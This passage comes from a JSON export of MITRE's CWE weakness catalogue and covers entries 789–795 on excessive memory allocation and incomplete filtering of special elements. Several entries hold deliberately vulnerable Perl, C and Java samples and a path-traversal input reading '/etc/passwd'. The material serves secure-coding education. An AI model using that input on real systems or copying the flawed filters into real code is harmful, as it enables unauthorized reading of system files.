Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}]}},"789":{"attr":{"@_ID":"789","@_Name":"Memory Allocation with Excessive Size Value","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1284","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion","Description":"When a weakness allocates excessive memory on the stack, it is often described as \\"stack exhaustion,\\" which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Memory)","Note":"Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary."},{"Phase":"Operation","Description":"Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider the following code, which accepts an untrusted size value and allocates a buffer to contain a string of the given size.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int size = GetUntrustedInt();unsigned int totBytes = size * sizeof(char);char *string = (char *)malloc(totBytes);InitializeString(string);","xhtml:br":["","","","",""],"xhtml:i":"/* ignore integer overflow (CWE-190) for this example */"}},"Body_Text":["Suppose an attacker provides a size value of:",{"xhtml:div":{"xhtml:div":12345678}},"This will cause 305,419,896 bytes (over 291 megabytes) to be allocated for the string."]},{"Intro_Text":"Consider the following code, which accepts an untrusted size value and uses the size as an initial capacity for a HashMap.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"unsigned int size = GetUntrustedInt();HashMap list = new HashMap(size);","xhtml:br":""}},"Body_Text":"The HashMap constructor will verify that the initial capacity is not negative, however there is no check in place to verify that sufficient memory is present. If the attacker provides a large enough value, the application will run into an OutOfMemoryError."},{"attr":{"@_Demonstrative_Example_ID":"DX-137"},"Intro_Text":"This code performs a stack allocation based on a length calculation.","Example_Code":{"#text":"}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int a = 5, b = 6;size_t len = a - b;char buf[len]; // Just blows up the stack","xhtml:br":["",""]}},"Body_Text":["Since a and b are declared as signed ints, the \\"a - b\\" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer\'s memory space.","Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker\'s input to attain the negative value."]},{"attr":{"@_Demonstrative_Example_ID":"DX-138"},"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action.","Example_Code":{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\'); // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"int pre_len = sizeof(\\"preamble: \\");char buf[pre_len - msg_len];","xhtml:i":["// Note space at the end of the string - assume all strings have preamble with space","... Do processing here if we get this far"],"xhtml:br":["","",""]}},"Body_Text":"The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations."},{"Intro_Text":"The following code obtains an untrusted number that is used as an index into an array of messages.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $num = GetUntrustedNumber();my @messages = ();$messages[$num] = \\"Hello World\\";","xhtml:br":["","",""]}},"Body_Text":["The index is not validated at all (CWE-129), so it might be possible for an attacker to modify an element in @messages that was not intended. If an index is used that is larger than the current size of the array, the Perl interpreter automatically expands the array so that the large index works.","If $num is a large value such as 2147483648 (1<<31), then the assignment to $messages[$num] would attempt to create a very large array, then eventually produce an error message such as:","Out of memory during array extend","This memory exhaustion will cause the Perl program to exit, possibly a denial of service. In addition, the lack of memory could also prevent many other programs from successfully running on the system."]},{"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action. The buffer length ends up being -1 resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations.","Example_Code":[{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\'); // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"int pre_len = sizeof(\\"preamble: \\"); // Note space at the end of the string - assume all strings have preamble with space","attr":{"@_style":"margin-left:10px;"}},{"#text":"char buf[pre_len - msg_len];","attr":{"@_style":"margin-left:10px;"}},{"#text":"... Do processing here and set status","attr":{"@_style":"margin-left:10px;"}},{"#text":"return status;","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\'); // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"int pre_len = sizeof(\\"preamble: \\"); // Note space at the end of the string - assume all strings have preamble with space","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (pre_len <= msg_len) { // Log error; return error_code; }","attr":{"@_style":"margin-left:10px;"}},{"#text":"char buf[pre_len - msg_len];","attr":{"@_style":"margin-left:10px;"}},{"#text":"... Do processing here and set status","attr":{"@_style":"margin-left:10px;"}},{"#text":"return status;","attr":{"@_style":"margin-left:10px;"}}]}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-3701","Description":"program uses ::alloca() for encoding messages, but large messages trigger segfault","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3701"},{"Reference":"CVE-2008-1708","Description":"memory consumption and daemon exit by specifying a large value in a length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1708"},{"Reference":"CVE-2008-0977","Description":"large value in a length field leads to memory consumption and crash when no more memory is available","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0977"},{"Reference":"CVE-2006-3791","Description":"large key size in game program triggers crash when a resizing function cannot allocate enough memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3791"},{"Reference":"CVE-2004-2589","Description":"large Content-Length HTTP header value triggers application crash in instant messaging application due to failure in memory allocation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2589"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":35,"Entry_Name":"SOAP Array Abuse"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS32-PL","Entry_Name":"Validate any integer that is used as an array index","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-789"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, "Resource Limits", Page 574"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-789"}}]},"Notes":{"Note":[{"#text":"This weakness can be closely associated with integer overflows (CWE-190). Integer overflow attacks would concentrate on providing an extremely large number that triggers an overflow that causes less memory to be allocated than expected. By providing a large value that does not trigger an integer overflow, the attacker could still cause excessive amounts of memory to be allocated.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Uncontrolled memory allocation is possible in many languages, such as dynamic array allocation in perl or initial size parameters in Collections in Java. However, languages like C and C++ where programmers have the power to more directly control memory management will be more susceptible."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Uncontrolled Memory Allocation","attr":{"@_Date":"2020-12-10"}}}},"790":{"attr":{"@_ID":"790","@_Name":"Improper Filtering of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"791":{"attr":{"@_ID":"791","@_Name":"Incomplete Filtering of Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"790","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"792":{"attr":{"@_ID":"792","@_Name":"Incomplete Filtering of One or More Instances of Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component.","Extended_Description":{"xhtml:p":"Incomplete filtering of this nature involves either:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["only filtering a single instance of a special element when more exist, or","not filtering all instances or all elements where multiple special elements exist."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"791","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"793":{"attr":{"@_ID":"793","@_Name":"Only Filtering One Instance of a Special Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component.","Extended_Description":"Incomplete filtering of this nature may be location-dependent, as in only the first or last element is filtered.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"792","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"794":{"attr":{"@_ID":"794","@_Name":"Incomplete Filtering of Multiple Instances of Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component.","Extended_Description":{"xhtml:p":"Incomplete filtering of this nature may be applied to:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["sequential elements (special elements that appear next to each other) or","non-sequential elements (special elements that appear multiple times in different locations)."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"792","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"795":{"attr":{"@_ID":"795","@_Name":"Only Filtering Special Elements at a Specified Location","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component.","Extended_Description":{"xhtml:p":["A filter might only account for instances of special elements when they occur:","This may leave special elements in the data that did not match the filter position, but still may be dangerous."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["relative to a marker (e.g. \\"at the beginning/end of string; the second argument\\"), or","at an absolute position (e.g. \\"byte number 10\\")."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"791","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-3"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter a \\"../\\" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/^\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression is only looking for an instance of \\"../\\" at the beginning of the string, it only removes the first \\"../\\" element. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-4"},"Intro_Text":"The following code takes untrusted input and uses a substring function to filter a 3-character \\"../\\" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq \'../\') {}my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""],"xhtml:div":{"#text":"$Username = substr($Username, 3);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the if function is only looking for a substring of \\"../\\" between the 0 and 2 position, it only removes that specific \\"../\\" element. So an input value such as:","will have the first \\"../\\" filtered, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated 